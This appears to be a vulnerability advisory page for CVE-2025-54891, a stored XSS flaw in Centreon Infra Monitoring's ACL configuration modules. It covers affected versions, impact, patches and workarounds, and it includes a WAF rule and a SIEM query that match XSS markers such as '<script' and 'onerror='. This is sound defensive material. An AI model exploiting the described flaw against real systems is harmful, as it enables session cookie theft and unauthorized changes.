CVE-2025-54891 – This stored XSS vulnerability in Centreon Infra... (How to Fix)

Q: What is the severity of CVE-2025-54891?

CVE-2025-54891 has a CVSS score of 6.8 (MEDIUM). This stored XSS vulnerability in Centreon Infra Monitoring allows authenticated users with elevated privileges to inject malicious scripts into ACL Resource access configuration modules. When other users view these compromised pages, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. The vulnerability affects Centreon Infra Monitoring versions 24.10.0-24.10.12, 24.04.0-24.04.17, and 23.10.0-23.10.27.

📋 TL;DR

This stored XSS vulnerability in Centreon Infra Monitoring allows authenticated users with elevated privileges to inject malicious scripts into ACL Resource access configuration modules. When other users view these compromised pages, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. The vulnerability affects Centreon Infra Monitoring versions 24.10.0-24.10.12, 24.04.0-24.04.17, and 23.10.0-23.10.27.

💻 Affected Systems

Products:

Centreon Infra Monitoring

Versions: 24.10.0-24.10.12, 24.04.0-24.04.17, 23.10.0-23.10.27

Operating Systems: All supported platforms

Default Config Vulnerable: ⚠️ Yes

Notes: Requires authenticated user with elevated privileges (ACL configuration access).

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Privileged attacker steals administrator credentials, gains full system control, and pivots to other systems in the monitoring infrastructure.

🟠

Likely Case

Privileged user steals session cookies of other administrators, performs unauthorized configuration changes, or exfiltrates sensitive monitoring data.

🟢

If Mitigated

Limited impact due to proper privilege separation, input validation, and output encoding preventing successful exploitation.

🌐 Internet-Facing: MEDIUM - If Centreon web interface is exposed to internet, attackers could exploit this after compromising a privileged account.

🏢 Internal Only: HIGH - Internal privileged users can exploit this to escalate privileges or maintain persistence within the monitoring system.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Requires authenticated privileged access to ACL configuration modules. Stored XSS payload persists until cleaned.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 24.10.13, 24.04.18, 23.10.28

Vendor Advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122

Restart Required: No

Instructions:

1. Backup your Centreon configuration and database. 2. Update to patched version via package manager (yum update centreon-web) or manual installation from releases page. 3. Verify update completed successfully.

🔧 Temporary Workarounds

Restrict ACL Configuration Access

all

Temporarily limit access to ACL Resource configuration modules to only essential administrators.

# Review and modify user roles in Centreon web interface under Configuration > Users > Contacts/Users

Implement WAF Rules

all

Deploy web application firewall rules to block XSS payloads in ACL configuration parameters.

# Example ModSecurity rule: SecRule ARGS "<script" "id:1001,phase:2,deny,status:403,msg:'XSS Attempt'"
# Configure in your WAF solution

🧯 If You Can't Patch

Implement strict input validation and output encoding for all ACL configuration fields
Apply principle of least privilege - restrict ACL configuration access to minimum necessary users

🔍 How to Verify

Check if Vulnerable:

Check Centreon web version via web interface (Administration > Parameters > Centreon UI) or command: rpm -qa | grep centreon-web

Check Version:

rpm -qa | grep centreon-web || dpkg -l | grep centreon-web

Verify Fix Applied:

Confirm version is 24.10.13, 24.04.18, or 23.10.28 or higher. Test ACL configuration fields for proper input sanitization.

📡 Detection & Monitoring

Log Indicators:

Unusual modifications to ACL configurations
Multiple failed login attempts followed by ACL access
Suspicious JavaScript in configuration audit logs

Network Indicators:

Unexpected outbound connections from Centreon server after ACL configuration changes
Traffic patterns suggesting data exfiltration

SIEM Query:

source="centreon.log" AND ("ACL" OR "configuration") AND ("script" OR "javascript:" OR "onerror=" OR suspicious_patterns)

📊 Metadata

CVE ID: CVE-2025-54891

CVSS v3 Score: 6.8 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CWE: CWE-79

EPSS Score: 0.01% exploit probability (1.8th percentile)

Published: October 14, 2025

Last Updated: October 21, 2025

🔗 References

https://github.com/centreon/centreon/releases Release Notes
https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-54891, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Centreon Web by Centreon

Centreon Web by Centreon

Centreon Web by Centreon

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Restrict ACL Configuration Access

Implement WAF Rules

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities